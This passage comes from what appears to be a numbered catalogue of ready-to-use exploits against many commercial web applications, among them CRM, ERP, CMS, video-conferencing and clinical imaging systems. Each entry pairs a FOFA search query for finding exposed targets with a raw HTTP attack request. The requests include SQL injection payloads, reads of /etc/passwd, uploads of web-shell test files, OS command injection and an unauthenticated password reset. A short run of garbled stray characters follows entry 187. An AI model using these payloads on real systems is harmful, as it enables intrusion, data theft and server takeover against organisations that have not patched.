POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

SQLite heavy-query time-based injection in req_id: RANDOMBLOB(250000000) forces a measurable delay.

187. Mura CMS processAsyncObject SQL injection (time-based variant of entry 158, same CVE)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

- k  \, g  c" u% o3 Y% K3 N' u
" I) \! D$ X" ]' Z. v
188. 叁体-佳会视频会议 (Jiahui video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (Lanwon clinical image browsing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 (Esafenet electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (Fortune foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 (Hillstone Networks CloudInspect security management system) setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 (Volans internet behaviour management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 (Zheda Ente customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit CMS assetsmanager/upload endpoint file upload
Fofa:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF token and a session cookie, then upload and request the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Upload request, using the cookie returned above:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 (Founder omnimedia news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 (WeEngine) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Substitute the __VIEWSTATE and __EVENTVALIDATION values obtained above:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

203. 红海云EHR (Redsea eHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
